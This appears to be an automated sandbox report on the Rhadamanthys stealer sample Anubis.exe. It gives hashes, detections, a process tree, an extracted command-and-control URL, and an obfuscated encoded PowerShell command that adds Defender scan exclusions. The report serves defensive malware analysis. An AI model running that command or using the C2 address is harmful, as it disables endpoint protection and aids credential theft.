Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
29-01-2025 18:22
Static task
static1
Behavioral task
behavioral1
Sample
Anubis.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Anubis.exe
Resource
win10v2004-20250129-en
General
-
Target
Anubis.exe
-
Size
1.2MB
-
MD5
c2adb7ff42f1c961035f17bad5bee12d
-
SHA1
e2ae36539f9ff88e8a89d750e99d15ea6e84f0dc
-
SHA256
4b350ae0b85aa7f7818e37e3f02397cd3667af8d62eb3132fb3297bd96a0abe2
-
SHA512
16413f90689cfa3fc509637bea54634ead1bba7f89d621bbc8096279f2413cd3477142a63becfa457e5756583c34049699ab1e960d1133dad2f72e3325ecb348
-
SSDEEP
24576:uDDgbYd14JwD00GR/L4Sgh5ovGpuIGPBgyjhgQJ8L/inWS:gcbILXoO3p9GP6ydk/inWS
Malware Config
Extracted
rhadamanthys
https://195.3.223.126:4287/9d0dc091285eb9fbf2e/o8f3c8oj.8rdif
Signatures
-
Detect rhadamanthys stealer shellcode 2 IoCs
resource yara_rule behavioral1/memory/1780-18-0x0000000001F00000-0x0000000002300000-memory.dmp family_rhadamanthys behavioral1/memory/1780-19-0x0000000001F00000-0x0000000002300000-memory.dmp family_rhadamanthys -
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Rhadamanthys family
-
Executes dropped EXE 2 IoCs
pid Process 2248 Launcher.exe 1780 WindowsHost.exe -
Loads dropped DLL 4 IoCs
pid Process 1768 Anubis.exe 2892 Process not Found 1768 Anubis.exe 1768 Anubis.exe -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Anubis.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WindowsHost.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2968 powershell.exe 1780 WindowsHost.exe 1780 WindowsHost.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2968 powershell.exe Token: SeShutdownPrivilege 1780 WindowsHost.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 1768 wrote to memory of 2968 1768 Anubis.exe 31 PID 1768 wrote to memory of 2968 1768 Anubis.exe 31 PID 1768 wrote to memory of 2968 1768 Anubis.exe 31 PID 1768 wrote to memory of 2968 1768 Anubis.exe 31 PID 1768 wrote to memory of 2248 1768 Anubis.exe 33 PID 1768 wrote to memory of 2248 1768 Anubis.exe 33 PID 1768 wrote to memory of 2248 1768 Anubis.exe 33 PID 1768 wrote to memory of 2248 1768 Anubis.exe 33 PID 2248 wrote to memory of 2172 2248 Launcher.exe 35 PID 2248 wrote to memory of 2172 2248 Launcher.exe 35 PID 2248 wrote to memory of 2172 2248 Launcher.exe 35 PID 1768 wrote to memory of 1780 1768 Anubis.exe 36 PID 1768 wrote to memory of 1780 1768 Anubis.exe 36 PID 1768 wrote to memory of 1780 1768 Anubis.exe 36 PID 1768 wrote to memory of 1780 1768 Anubis.exe 36
Processes
-
C:\Users\Admin\AppData\Local\Temp\Anubis.exe"C:\Users\Admin\AppData\Local\Temp\Anubis.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1768 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAYQBzACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAegBiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAcABnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHkAdgBuACMAPgA="2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2968
-
-
C:\Users\Admin\AppData\Local\Temp\Launcher.exe"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2248 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c pause3⤵PID:2172
-
-
-
C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe"C:\Users\Admin\AppData\Local\Temp\WindowsHost.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1780
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
748KB
MD5a8db312e9364d1d82600bf5a398212fe
SHA13bbacada2b463bb9f62ed7ae34a8e8440bc91dcb
SHA25684e01afa9f1f134caa4e49456f4a1700e17bae4cbd962c1dfdf6cdfd61b3a3cb
SHA512a7994ab1901aa1fc6ee89a302a92c9ec7fc3febc348a21e0445d4e17bb2c736ef563543dde94a01fe5d81094e792b354db1d02f8069992b36791fdbb0f8a5782
-
Filesize
456KB
MD5515a0c8be21a5ba836e5687fc2d73333
SHA1c52be9d0d37ac1b8d6bc09860e68e9e0615255ab
SHA2569950788284df125c7359aeb91435ed24d59359fac6a74ed73774ca31561cc7ae
SHA5124e2bd7ce844bba25aff12e2607c4281b59f7579b9407139ef6136ef09282c7afac1c702adebc42f8bd7703fac047fd8b5add34df334bfc04d3518ea483225522